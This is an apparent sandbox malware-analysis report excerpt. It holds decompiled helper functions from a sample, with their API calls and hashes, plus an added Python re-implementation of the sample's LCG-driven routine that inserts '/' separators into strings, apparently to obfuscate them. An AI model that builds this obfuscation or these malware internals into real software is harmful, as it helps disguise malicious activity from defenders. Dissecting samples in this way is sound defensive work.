• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: memcpy$AllocateHeaplstrlen
                      • String ID:
                      • API String ID: 1819133394-0
                      • Opcode ID: eaf27848541ea756ce03ed7c61785dff449b4abf4040d161f102095ea44ad664
                      • Instruction ID: b6f7d38f7759ad7db7df44187bebf71d179e9cb9bb1a5c001b369c40f6e7a71c
                      • Opcode Fuzzy Hash: eaf27848541ea756ce03ed7c61785dff449b4abf4040d161f102095ea44ad664
                      • Instruction Fuzzy Hash: 4A1129B2E01215AFD7208F6ADC84EDE7BEEEB803A0B1401B6F808D7140F7719E1487A0
                      Uniqueness

                      Uniqueness Score: -1.00%
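The routine decompiled as E02BD2708 above takes a NUL-terminated string, allocates len + len/8 + 1 bytes from the heap at *0x2bda2d8, and copies the string out in chunks whose lengths come from a 32-bit LCG (state at 0x2bda2f0, stepped as seed * 0x19660d + 0x3c6ef35f); after every chunk it writes a '/' (0x2f), and it stops chunking once 8 or fewer bytes remain, copying those verbatim. The Python below is an added re-implementation for analysts, not code from the report or from the sample: the function names, the constructed 64-byte input and the choice to start from the seed value 0xdd708feb noted by the decompiler are assumptions made here. It also handles the failure mode the decompilation exposes: for inputs of 8 bytes or fewer the divisor min(len, 24) - 8 is zero.

```python
from typing import Tuple

MASK32 = 0xFFFFFFFF
LCG_MUL = 0x19660D         # multiplier seen at 0x02bd2746..0x02bd2756
LCG_INC = 0x3C6EF35F       # increment from the same instructions
SEED_AT_DUMP = 0xDD708FEB  # *0x2bda2f0 at dump time, per the decompiler comment
SEP = 0x2F                 # '/', written after every chunk

# Constructed sample input (not taken from the sample's traffic): 64 bytes, no '/'.
SAMPLE = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+="


def lcg_next(seed: int) -> int:
    """One LCG step: seed = seed * 0x19660d + 0x3c6ef35f (mod 2**32)."""
    return (seed * LCG_MUL + LCG_INC) & MASK32


def insert_slashes(data: bytes, seed: int = SEED_AT_DUMP) -> Tuple[bytes, int]:
    """Python rendering of E02BD2708.

    Copies `data` in chunks of 8..23 bytes, each followed by '/', until 8 or
    fewer bytes remain; those are copied verbatim.  The native routine keeps
    the LCG state in a global, so the advanced seed is returned as well.
    """
    remaining = len(data)
    if remaining <= 8:
        # Chunk length is (x % (min(len, 24) - 8)) + 8.  For len <= 8 the
        # divisor is zero and the native code would fault on the first
        # iteration, so the routine is only meaningful for longer inputs.
        raise ValueError("input must be longer than 8 bytes")
    out = bytearray()
    pos = 0
    while True:                      # do { ... } while (remaining > 8)
        chunk_max = min(remaining, 0x18)
        seed = lcg_next(seed)
        take = (seed & 0xFFFF) % (chunk_max - 8) + 8
        out += data[pos:pos + take]
        out.append(SEP)
        pos += take
        remaining -= take
        if remaining <= 8:
            break
    out += data[pos:]                # final 1..8 bytes (plus the NUL natively)
    # The native allocation is len + len/8 + 1 bytes; the result always fits
    # because every separated chunk is at least 8 bytes long.
    assert len(out) <= len(data) + (len(data) >> 3)
    return bytes(out), seed


def strip_slashes(chunked: bytes) -> bytes:
    """Inverse transform.  Assumes the original contained no '/' of its own;
    that is an assumption made here, the report does not describe the input."""
    return chunked.replace(bytes([SEP]), b"")
```

Because chunk boundaries depend only on the LCG state, two runs from the same seed produce the same layout, and the seed advances once per chunk; an analyst recovering the original string needs nothing but the slash removal.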

                      C-Code - Quality: 64%
                      			E02BD23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				intOrPtr _v36;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				void _v60;
                      				char _v64;
                      				intOrPtr _t18;
                      				intOrPtr _t19;
                      				intOrPtr _t26;
                      				intOrPtr _t27;
                      				long _t28;
                      
                      				_t27 = __edi;
                      				_t26 = _a8;
                      				_t28 = E02BD3A63(_a4, _t26, __edi);
                      				if(_t28 != 0) {
                      					memset( &_v60, 0, 0x38);
                      					_t18 =  *0x2bda348; // 0x9dd5a8
                      					_t28 = 0;
                      					_v64 = 0x3c;
                      					if(_a12 == 0) {
                      						_t7 = _t18 + 0x2bdb50c; // 0x70006f
                      						_t19 = _t7;
                      					} else {
                      						_t6 = _t18 + 0x2bdb8d8; // 0x750072
                      						_t19 = _t6;
                      					}
                      					_v52 = _t19;
                      					_push(_t28);
                      					_v48 = _a4;
                      					_v44 = _t26;
                      					_v36 = _t27;
                      					E02BD5B56();
                      					_push( &_v64);
                      					if( *0x2bda100() == 0) {
                      						_t28 = GetLastError();
                      					}
                      					_push(1);
                      					E02BD5B56();
                      				}
                      				return _t28;
                      			}

                      APIs
                        • Part of subcall function 02BD3A63: SysAllocString.OLEAUT32(00000000), ref: 02BD3ABD
                        • Part of subcall function 02BD3A63: SysAllocString.OLEAUT32(0070006F), ref: 02BD3AD1
                        • Part of subcall function 02BD3A63: SysAllocString.OLEAUT32(00000000), ref: 02BD3AE3
                      • memset.NTDLL ref: 02BD23E7
                      • GetLastError.KERNEL32 ref: 02BD2433
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: AllocString$ErrorLastmemset
                      • String ID: <$@MqtNqt
                      • API String ID: 3736384471-349977332
                      • Opcode ID: a046ad0f53194b5c84590ccc66bf857ceda445103b9d2bb8fef78c9de605ae72
                      • Instruction ID: b1746d9ca7cf59044076f5cec92d927abf9e6caf41edf2712c8169614f983cf3
                      • Opcode Fuzzy Hash: a046ad0f53194b5c84590ccc66bf857ceda445103b9d2bb8fef78c9de605ae72
                      • Instruction Fuzzy Hash: 2B014C71D01218AFCB10EFA8D884ECEBBB8EB08754F4584A6FE14E7241F77099408FA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD7843(void* __esi) {
                      				struct _SECURITY_ATTRIBUTES* _v4;
                      				void* _t8;
                      				void* _t10;
                      
                      				_v4 = 0;
                      				memset(__esi, 0, 0x38);
                      				_t8 = CreateEventA(0, 1, 0, 0);
                      				 *(__esi + 0x1c) = _t8;
                      				if(_t8 != 0) {
                      					_t10 = CreateEventA(0, 1, 1, 0);
                      					 *(__esi + 0x20) = _t10;
                      					if(_t10 == 0) {
                      						CloseHandle( *(__esi + 0x1c));
                      					} else {
                      						_v4 = 1;
                      					}
                      				}
                      				return _v4;
                      			}

                      APIs
                      • memset.NTDLL ref: 02BD7851
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 02BD7866
                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02BD7873
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02BD3F34,00000000,?), ref: 02BD7885
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: CreateEvent$CloseHandlememset
                      • String ID:
                      • API String ID: 2812548120-0
                      • Opcode ID: 42d574f1b60387c6a9e9c4fd9dc9fc42e0991a1bbe635a35b56cca8be36c1490
                      • Instruction ID: 2d58586ee5ed730ef41f52d25b9bc872b185d6e702ad10f62bde529c9f34e0ca
                      • Opcode Fuzzy Hash: 42d574f1b60387c6a9e9c4fd9dc9fc42e0991a1bbe635a35b56cca8be36c1490
                      • Instruction Fuzzy Hash: 40F089B154570C7FD3145F26ECC4CB7FB9CEB8119C7114D7DF14292111E772A8148AA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,02190F70), ref: 021912EB
                      • GetVersion.KERNEL32(?,02190F70), ref: 021912FA
                      • GetCurrentProcessId.KERNEL32(?,02190F70), ref: 02191316
                      • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,02190F70), ref: 0219132F
                      Memory Dump Source
                      • Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_server.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CreateCurrentEventOpenVersion
                      • String ID:
                      • API String ID: 845504543-0
                      • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                      • Instruction ID: a06d8769dc8540807e161df94735bec67f39759a6d66d35476c2ad45249c505f
                      • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                      • Instruction Fuzzy Hash: 13F031B0681301ABEF509F797E09B963F79A789722F100135E645FA1E4D77086C1CB5C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD3230() {
                      				void* _t1;
                      				intOrPtr _t5;
                      				void* _t6;
                      				void* _t7;
                      				void* _t11;
                      
                      				_t1 =  *0x2bda30c; // 0x308
                      				if(_t1 == 0) {
                      					L8:
                      					return 0;
                      				}
                      				SetEvent(_t1);
                      				_t11 = 0x7fffffff;
                      				while(1) {
                      					SleepEx(0x64, 1);
                      					_t5 =  *0x2bda35c; // 0x0
                      					if(_t5 == 0) {
                      						break;
                      					}
                      					_t11 = _t11 - 0x64;
                      					if(_t11 > 0) {
                      						continue;
                      					}
                      					break;
                      				}
                      				_t6 =  *0x2bda30c; // 0x308
                      				if(_t6 != 0) {
                      					CloseHandle(_t6);
                      				}
                      				_t7 =  *0x2bda2d8; // 0x31c0000
                      				if(_t7 != 0) {
                      					HeapDestroy(_t7);
                      				}
                      				goto L8;
                      			}

                      APIs
                      • SetEvent.KERNEL32(00000308,00000001,02BD109A), ref: 02BD323B
                      • SleepEx.KERNEL32(00000064,00000001), ref: 02BD324A
                      • CloseHandle.KERNEL32(00000308), ref: 02BD326B
                      • HeapDestroy.KERNEL32(031C0000), ref: 02BD327B
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: CloseDestroyEventHandleHeapSleep
                      • String ID:
                      • API String ID: 4109453060-0
                      • Opcode ID: 950af277803b3aa2fc50da2fd1d245b12c8d89e7236b6141f7458d0b230a379e
                      • Instruction ID: 42644b8504d5a0d9941f192acb1a913eee194ebae0b66d454e12c745714e795e
                      • Opcode Fuzzy Hash: 950af277803b3aa2fc50da2fd1d245b12c8d89e7236b6141f7458d0b230a379e
                      • Instruction Fuzzy Hash: 98F03075E8275197DF105B39A9A8BC637D8EB047E1B084990BC40E32C2FB30D450CE61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 58%
                      			E02BD2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                      				intOrPtr* _v8;
                      				void* _t17;
                      				intOrPtr* _t22;
                      				void* _t27;
                      				char* _t30;
                      				void* _t33;
                      				void* _t34;
                      				void* _t36;
                      				void* _t37;
                      				void* _t39;
                      				int _t42;
                      
                      				_t17 = __eax;
                      				_t37 = 0;
                      				__imp__(_a4, _t33, _t36, _t27, __ecx);
                      				_t2 = _t17 + 1; // 0x1
                      				_t28 = _t2;
                      				_t34 = E02BD33DC(_t2);
                      				if(_t34 != 0) {
                      					_t30 = E02BD33DC(_t28);
                      					if(_t30 == 0) {
                      						E02BD61DA(_t34);
                      					} else {
                      						_t39 = _a4;
                      						_t22 = E02BD7AE9(_t39);
                      						_v8 = _t22;
                      						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                      							_a4 = _t39;
                      						} else {
                      							_t26 = _t22 + 2;
                      							_a4 = _t22 + 2;
                      							_t22 = E02BD7AE9(_t26);
                      							_v8 = _t22;
                      						}
                      						if(_t22 == 0) {
                      							__imp__(_t34, _a4);
                      							 *_t30 = 0x2f;
                      							 *((char*)(_t30 + 1)) = 0;
                      						} else {
                      							_t42 = _t22 - _a4;
                      							memcpy(_t34, _a4, _t42);
                      							 *((char*)(_t34 + _t42)) = 0;
                      							__imp__(_t30, _v8);
                      						}
                      						 *_a8 = _t34;
                      						_t37 = 1;
                      						 *_a12 = _t30;
                      					}
                      				}
                      				return _t37;
                      			}

                      APIs
                      • lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?,?,747581D0), ref: 02BD2064
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                        • Part of subcall function 02BD7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02BD2092,00000000,00000001,00000001,?,?,02BD51F7,?,?,?,?,00000102), ref: 02BD7AF7
                        • Part of subcall function 02BD7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?,?,747581D0,00000000), ref: 02BD7B01
                      • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?), ref: 02BD20C2
                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02BD20D2
                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02BD20DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                      • String ID:
                      • API String ID: 3767559652-0
                      • Opcode ID: 2d48be46b7a6996eda33b4b4b49b875b370b26d256c11f8909c16d52aeea006a
                      • Instruction ID: ab8c9cb01fa9c9e2df48ece2118e792c995e6258187956376c23e26fc58d9956
                      • Opcode Fuzzy Hash: 2d48be46b7a6996eda33b4b4b49b875b370b26d256c11f8909c16d52aeea006a
                      • Instruction Fuzzy Hash: 9A219072500296EBCB129F68DC54ADABFB9EF45290B5480D5FD099B202FB31D941CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      /* Concatenates two wide (UTF-16) strings into a freshly allocated buffer.
                         E02BD33DC is the sample's heap-allocation wrapper (it calls RtlAllocateHeap, see the subcall listed above).
                         Returns the new buffer, or 0 if the allocation failed. */
                      WCHAR* E02BD5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                      	void* _v8;
                      	void* _t18;
                      	int _t10;
                      	int _t25;
                      	int _t29;
                      	int _t34;

                      	_t29 = lstrlenW(_a4);                              /* length of first string, in characters */
                      	_t25 = lstrlenW(_a8);                              /* length of second string, in characters */
                      	/* 2 * (len1 + len2) bytes for the characters plus 2 bytes for the terminating wide NUL */
                      	_t18 = E02BD33DC(_t25 + _t29 + _t25 + _t29 + 2);
                      	_v8 = _t18;
                      	if(_t18 != 0) {
                      		_t34 = _t29 + _t29;                            /* byte length of first string */
                      		memcpy(_t18, _a4, _t34);                       /* copy first string without its terminator */
                      		_t10 = _t25 + 2; // 0x2
                      		memcpy(_v8 + _t34, _a8, _t25 + _t10);         /* copy second string including its terminator (2*len2 + 2 bytes) */
                      	}
                      	return _v8;
                      }

                      APIs
                      • lstrlenW.KERNEL32(004F0053,?,74715520,00000008,035B9270,?,02BD52D0,004F0053,035B9270,?,?,?,?,?,?,02BD68B6), ref: 02BD5DF4
                      • lstrlenW.KERNEL32(02BD52D0,?,02BD52D0,004F0053,035B9270,?,?,?,?,?,?,02BD68B6), ref: 02BD5DFB
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • memcpy.NTDLL(00000000,004F0053,747169A0,?,?,02BD52D0,004F0053,035B9270,?,?,?,?,?,?,02BD68B6), ref: 02BD5E1B
                      • memcpy.NTDLL(747169A0,02BD52D0,00000002,00000000,004F0053,747169A0,?,?,02BD52D0,004F0053,035B9270), ref: 02BD5E2E
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: lstrlenmemcpy$AllocateHeap
                      • String ID:
                      • API String ID: 2411391700-0
                      • Opcode ID: 5fe9bdde1005337b5a002fd52ebf7c32bc44b8dc0bca2ee744f05ee1ce99fddc
                      • Instruction ID: d953914d82aea308e8060a4bea07730c58c4371d68a48a439b445d703a0066de
                      • Opcode Fuzzy Hash: 5fe9bdde1005337b5a002fd52ebf7c32bc44b8dc0bca2ee744f05ee1ce99fddc
                      • Instruction Fuzzy Hash: 34F04F72900119BBCF11EFA8CC84CCE7BADEF0835475140A2ED18D7101F731EA108BA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • lstrlen.KERNEL32(035B9C38,00000000,00000000,00000000,02BD3EF9,00000000), ref: 02BD7573
                      • lstrlen.KERNEL32(?), ref: 02BD757B
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • lstrcpy.KERNEL32(00000000,035B9C38), ref: 02BD758F
                      • lstrcat.KERNEL32(00000000,?), ref: 02BD759A
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                      • String ID:
                      • API String ID: 74227042-0
                      • Opcode ID: 3bc096ff975a80e8aac224315ecf0bd9e9d326a52a96e5e9f512e2fd5ffd47b8
                      • Instruction ID: 35c353fccc30623cbbf42ec832d901380ad177ef1a372d3aa633953751da4694
                      • Opcode Fuzzy Hash: 3bc096ff975a80e8aac224315ecf0bd9e9d326a52a96e5e9f512e2fd5ffd47b8
                      • Instruction Fuzzy Hash: 10E09233902A20AB87116BA8BC48CDFFBBDFF896A0304485AF600D3101EB319811CBA5
                      Uniqueness

                      Uniqueness Score: -1.00%